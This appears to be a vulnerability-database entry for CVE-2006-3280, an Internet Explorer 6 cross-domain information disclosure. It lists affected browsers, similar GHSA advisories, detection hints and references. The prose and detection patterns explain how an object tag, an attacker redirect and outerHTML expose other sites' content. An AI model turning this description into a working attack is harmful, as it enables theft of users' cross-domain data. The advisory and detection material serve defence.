CVE-2006-3280
published 2006-06-28CVE-2006-3280: Cross-domain vulnerability in Microsoft Internet Explorer 6.0 allows remote attackers to access restricted information from other domains via an object tag…
PriorityP337high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
55.92%
98.9th percentile
Cross-domain vulnerability in Microsoft Internet Explorer 6.0 allows remote attackers to access restricted information from other domains via an object tag with a data parameter that references a link on the attacker's originating site that specifies a Location HTTP header that references the target site, which then makes that content available through the outerHTML attribute of the object, aka "Redirect Cross-Domain Information Disclosure Vulnerability."
Affected
11 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| advanced_search_technologies_inc | enigma_browser | — | — |
| fast_browser | fast_browser | — | — |
| flashpeak | slim_browser | — | — |
| gosurf_browser | gosurf_browser | — | — |
| maxthon | maxthon | — | — |
| microsoft | internet_explorer | — | — |
| more_quick_tools | greenbrowser | — | — |
| myweb4net | myweb4net_browser | — | — |
| netcaptor | netcaptor | — | — |
| phaseout | phaseout | — | — |
| softinform | finebrowser | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Look for HTML pages using an <object> tag with a 'data' parameter pointing to an attacker-controlled redirect (e.g., r.php) that issues a Location HTTP header to a cross-domain target, combined with outerHTML access in JavaScript. ↗
- →Detect JavaScript use of 'documentElement.outerHTML' on an embedded object element, which is the mechanism used to exfiltrate cross-domain page content in this exploit. ↗
- →Monitor for HTTP responses from attacker-controlled servers that issue a Location redirect header pointing to a third-party/target domain, where the initial request originated from an <object data=...> tag load. ↗
- ·The proof-of-concept exploit is described as incomplete; it demonstrates feasibility but may not be a fully weaponized payload. ↗
- ·The vulnerability was confirmed on a specific platform (Windows Server 2003 Enterprise Edition SP1); detection rules should account for the fact that exploitation context is tied to Internet Explorer's cross-domain policy enforcement. ↗
- ·A similar variant of this cross-domain outerHTML vulnerability also affects Slim Browser 4.07 build 100, so detection logic should not be scoped exclusively to Internet Explorer. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-mvgc-fgw6-3gxx: Cross-domain vulnerability in Microsoft Internet Explorer 6
ghsa_unreviewed·2022-05-01
CVE-2006-3280 [HIGH] GHSA-mvgc-fgw6-3gxx: Cross-domain vulnerability in Microsoft Internet Explorer 6
Cross-domain vulnerability in Microsoft Internet Explorer 6.0 allows remote attackers to access restricted information from other domains via an object tag with a data parameter that references a link on the attacker's originating site that specifies a Location HTTP header that references the target site, which then makes that content available through the outerHTML attribute of the object, aka "Redirect Cross-Domain Information Disclosure Vulnerability."
GHSA
GHSA-6mmm-jx2q-hx92: Cross-domain vulnerability in PhaseOut 5
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2006-6986 [HIGH] GHSA-6mmm-jx2q-hx92: Cross-domain vulnerability in PhaseOut 5
Cross-domain vulnerability in PhaseOut 5.4.4 allows remote attackers to access restricted information from other domains via an object tag with a data parameter that references a link on the attacker's originating site that specifies a Location HTTP header that references the target site, which then makes that content available through the outerHTML attribute of the object, a similar vulnerability to CVE-2006-3280.
GHSA
GHSA-fg3g-q7pq-h8mx: Cross-domain vulnerability in FineBrowser Freeware 3
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2006-6987 [HIGH] GHSA-fg3g-q7pq-h8mx: Cross-domain vulnerability in FineBrowser Freeware 3
Cross-domain vulnerability in FineBrowser Freeware 3.2.2 allows remote attackers to access restricted information from other domains via an object tag with a data parameter that references a link on the attacker's originating site that specifies a Location HTTP header that references the target site, which then makes that content available through the outerHTML attribute of the object, a similar vulnerability to CVE-2006-3280.
GHSA
GHSA-x92r-4rhh-jrqc: Cross-domain vulnerability in Fast Browser Pro 8
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2006-6991 [HIGH] GHSA-x92r-4rhh-jrqc: Cross-domain vulnerability in Fast Browser Pro 8
Cross-domain vulnerability in Fast Browser Pro 8.1 allows remote attackers to access restricted information from other domains via an object tag with a data parameter that references a link on the attacker's originating site that specifies a Location HTTP header that references the target site, which then makes that content available through the outerHTML attribute of the object, a similar vulnerability to CVE-2006-3280.
GHSA
GHSA-rj75-vrwf-xch7: Cross-domain vulnerability in MYweb4net Browser 3
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2006-6983 [HIGH] GHSA-rj75-vrwf-xch7: Cross-domain vulnerability in MYweb4net Browser 3
Cross-domain vulnerability in MYweb4net Browser 3.8.8.0 allows remote attackers to access restricted information from other domains via an object tag with a data parameter that references a link on the attacker's originating site that specifies a Location HTTP header that references the target site, which then makes that content available through the outerHTML attribute of the object, a similar vulnerability to CVE-2006-3280.
GHSA
GHSA-pggp-q5j5-59xw: Cross-domain vulnerability in Enigma Browser 3
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2006-6990 [HIGH] GHSA-pggp-q5j5-59xw: Cross-domain vulnerability in Enigma Browser 3
Cross-domain vulnerability in Enigma Browser 3.8.8 allows remote attackers to access restricted information from other domains via an object tag with a data parameter that references a link on the attacker's originating site that specifies a Location HTTP header that references the target site, which then makes that content available through the outerHTML attribute of the object, a similar vulnerability to CVE-2006-3280.
GHSA
GHSA-2cpp-wgf7-gr4j: Cross-domain vulnerability in Maxthon 1
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2006-6985 [HIGH] GHSA-2cpp-wgf7-gr4j: Cross-domain vulnerability in Maxthon 1
Cross-domain vulnerability in Maxthon 1.5.6 build 42 allows remote attackers to access restricted information from other domains via an object tag with a data parameter that references a link on the attacker's originating site that specifies a Location HTTP header that references the target site, which then makes that content available through the outerHTML attribute of the object, a similar vulnerability to CVE-2006-3280.
GHSA
GHSA-26cp-jrgm-wmvv: Cross-domain vulnerability in Slim Browser 4
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2006-6988 [HIGH] GHSA-26cp-jrgm-wmvv: Cross-domain vulnerability in Slim Browser 4
Cross-domain vulnerability in Slim Browser 4.07 build 100 allows remote attackers to access restricted information from other domains via an object tag with a data parameter that references a link on the attacker's originating site that specifies a Location HTTP header that references the target site, which then makes that content available through the outerHTML attribute of the object, a similar vulnerability to CVE-2006-3280.
GHSA
GHSA-63mx-p8f6-gxj7: Cross-domain vulnerability in GreenBrowser 3
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2006-6984 [HIGH] GHSA-63mx-p8f6-gxj7: Cross-domain vulnerability in GreenBrowser 3
Cross-domain vulnerability in GreenBrowser 3.4.0622 allows remote attackers to access restricted information from other domains via an object tag with a data parameter that references a link on the attacker's originating site that specifies a Location HTTP header that references the target site, which then makes that content available through the outerHTML attribute of the object, a similar vulnerability to CVE-2006-3280.
GHSA
GHSA-7w9c-p2pp-94gm: Cross-domain vulnerability in NetCaptor 4
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2006-6989 [HIGH] GHSA-7w9c-p2pp-94gm: Cross-domain vulnerability in NetCaptor 4
Cross-domain vulnerability in NetCaptor 4.5.7 Personal Edition allows remote attackers to access restricted information from other domains via an object tag with a data parameter that references a link on the attacker's originating site that specifies a Location HTTP header that references the target site, which then makes that content available through the outerHTML attribute of the object, a similar vulnerability to CVE-2006-3280.
GHSA
GHSA-894m-5vvh-8f23: Cross-domain vulnerability in GoSuRF Browser 2
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2006-6992 [HIGH] GHSA-894m-5vvh-8f23: Cross-domain vulnerability in GoSuRF Browser 2
Cross-domain vulnerability in GoSuRF Browser 2.62 allows remote attackers to access restricted information from other domains via an object tag with a data parameter that references a link on the attacker's originating site that specifies a Location HTTP header that references the target site, which then makes that content available through the outerHTML attribute of the object, a similar vulnerability to CVE-2006-3280.
No detection rules found.
No writeups or analysis indexed.
http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/047398.htmlhttp://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060627/3d930eda/PLEBO-2006.06.16-IE_ONE_MINOR_ONE_MAJOR.objhttp://secunia.com/advisories/20825http://secunia.com/advisories/21396http://secunia.com/internet_explorer_information_disclosure_vulnerability_testhttp://securitytracker.com/id?1016388http://www.kb.cert.org/vuls/id/883108http://www.securityfocus.com/archive/1/438785/100/0/threadedhttp://www.securityfocus.com/archive/1/438788/100/0/threadedhttp://www.securityfocus.com/archive/1/438811/100/0/threadedhttp://www.securityfocus.com/archive/1/438863/100/0/threadedhttp://www.securityfocus.com/archive/1/438864/100/0/threadedhttp://www.securityfocus.com/archive/1/439146/100/0/threadedhttp://www.securityfocus.com/bid/18682http://www.us-cert.gov/cas/techalerts/TA06-220A.htmlhttp://www.vupen.com/english/advisories/2006/2553http://www.vupen.com/english/advisories/2006/3212https://docs.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-042https://exchange.xforce.ibmcloud.com/vulnerabilities/27452https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A738http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/047398.htmlhttp://lists.grok.org.uk/pipermail/full-disclosure/attachments/20060627/3d930eda/PLEBO-2006.06.16-IE_ONE_MINOR_ONE_MAJOR.objhttp://secunia.com/advisories/20825http://secunia.com/advisories/21396http://secunia.com/internet_explorer_information_disclosure_vulnerability_testhttp://securitytracker.com/id?1016388http://www.kb.cert.org/vuls/id/883108http://www.securityfocus.com/archive/1/438785/100/0/threadedhttp://www.securityfocus.com/archive/1/438788/100/0/threadedhttp://www.securityfocus.com/archive/1/438811/100/0/threadedhttp://www.securityfocus.com/archive/1/438863/100/0/threadedhttp://www.securityfocus.com/archive/1/438864/100/0/threadedhttp://www.securityfocus.com/archive/1/439146/100/0/threadedhttp://www.securityfocus.com/bid/18682http://www.us-cert.gov/cas/techalerts/TA06-220A.htmlhttp://www.vupen.com/english/advisories/2006/2553http://www.vupen.com/english/advisories/2006/3212https://docs.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-042https://exchange.xforce.ibmcloud.com/vulnerabilities/27452https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A738
2006-06-28
Published